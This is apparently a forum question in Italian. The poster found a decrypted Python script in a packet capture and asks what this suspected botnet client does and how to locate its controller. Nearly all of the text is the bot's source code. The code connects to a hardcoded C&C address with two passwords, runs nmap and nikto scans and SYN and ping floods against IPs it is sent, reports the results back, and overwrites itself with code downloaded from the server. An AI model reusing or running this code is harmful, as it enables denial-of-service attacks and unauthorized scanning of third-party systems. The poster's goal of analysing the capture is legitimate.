Ho ottenuto uno script python decrittografato da un file pcap è una comunicazione da una botnet (proberamente il c & c) ma quando inizio lo script non ricevo login o password.
Che cosa fa questo script? E come posso trovare il controller client?
from twisted.internet import reactor
from twisted.internet.protocol import ReconnectingClientFactory
from twisted.protocols.basic import LineReceiver
import os
import re
import random
import sys
import subprocess
from base64 import b64encode, b64decode
class ZeroNetClientProtocol(LineReceiver):
delimiter = "\n"
def __init__(self, pass1, pass2):
self.pass1 = pass1
self.pass2 = pass2
self.version = 1.101
self.state = "INIT"
self.commands = {
"DOWNLOAD": {
"request_args": 1,
"request_handler": None,
"response_args": 2,
"response_handler": self.handleDownloadResponse,
},
"NIKTO": {
"request_args": 2,
"request_handler": self.handleAttackRequest,
"response_args": 2,
"response_handler": None
},
"NMAP": {
"request_args": 2,
"request_handler": self.handleAttackRequest,
"response_args": 2,
"response_handler": None
},
"PING": {
"request_args": 1,
"request_handler": self.handlePingRequest,
"response_args": 1,
"response_handler": None
},
"PINGFLOOD": {
"request_args": 3,
"request_handler": self.handleAttackRequest,
"response_args": 2,
"response_handler": None
},
"SYNFLOOD": {
"request_args": 3,
"request_handler": self.handleAttackRequest,
"response_args": 2,
"response_handler": None
},
"VERSION": {
"request_args": 0,
"request_handler": None,
"response_args": 1,
"response_handler": self.handleVersionResponse,
},
}
pass
def connectionMade(self):
self.sendLine(self.pass1)
self.sendLine(self.pass2)
def lineReceived(self, line):
print line
words = line.split()
if self.state == "INIT" and line == "OK":
print line
self.sendLine("VERSION?")
self.state = "COMMAND"
return
elif self.state == "INIT":
return
if len(words) <= 0:
print ("Unknown command")
return
matches = re.search(r"^(.+)([?!])$", words[0])
if not matches:
print ("Unknown command")
return
command = matches.group(1)
if matches.group(2) == '?':
command_type = 'REQUEST'
else:
command_type = 'RESPONSE'
if not self.commands.has_key(command):
print ("Unknown command")
return
if command_type == 'REQUEST':
request_args = self.commands[command]['request_args']
request_handler = self.commands[command]['request_handler']
if len(words) - 1 != request_args:
print ("Unknown command")
return
if request_handler:
request_handler(command, *words[1:])
else:
response_args = self.commands[command]['response_args']
response_handler = self.commands[command]['response_handler']
if len(words) - 1 != response_args:
print ("Unknown command")
return
if response_handler:
response_handler(command, *words[1:])
print command, command_type
def attack(self, ident, command, arg1, arg2, attack):
result = subprocess.check_output([command, arg1, str(arg2)])
self.sendLine("{0}! {1} {2}".format(attack, ident, b64encode(result)))
def handleAttackRequest(self, command, ident, ip, duration=0):
if not re.match("^[0-9]+$", ident) or not re.match("^[0-9.]+$", ip) or \
(duration and not re.match("^[0-9]+$", duration)):
print ("Unknown command")
return
if command == "NIKTO":
reactor.callInThread(self.attack, ident, "./nikto.sh", ip, 0, command)
elif command == "NMAP":
reactor.callInThread(self.attack, ident, "./nmap.sh", ip, 0, command)
elif command == "SYNFLOOD":
reactor.callInThread(self.attack, ident, "./synflood.sh", ip, duration,
command)
elif command == "PINGFLOOD":
reactor.callInThread(self.attack, ident, "./pingflood.sh", ip, duration,
command)
else:
print ("Unknown command")
return
def handleDownloadResponse(self, command, version, data):
f = open("client.py", "w")
f.write(b64decode(data))
f.close()
reactor.stop()
def handlePingRequest(self, command, ident):
self.sendLine("PING! {0}".format(ident))
def handleVersionResponse(self, command, version):
if float(version) > self.version:
self.sendLine("DOWNLOAD? {0}".format(str(float(version))))
class ZeroNetClientProtocolFactory(ReconnectingClientFactory):
def __init__(self, pass1, pass2):
self.pass1 = pass1
self.pass2 = pass2
def buildProtocol(self, addr):
return ZeroNetClientProtocol(self.pass1, self.pass2)
import sys
if len(sys.argv) != 3:
print "Usage: client.py <primary password> <secondary password>"
sys.exit(1)
pass1 = sys.argv[1]
pass2 = sys.argv[2]
reactor.connectTCP("82.94.242.254", 8123, ZeroNetClientProtocolFactory(pass1, pass2))
reactor.run()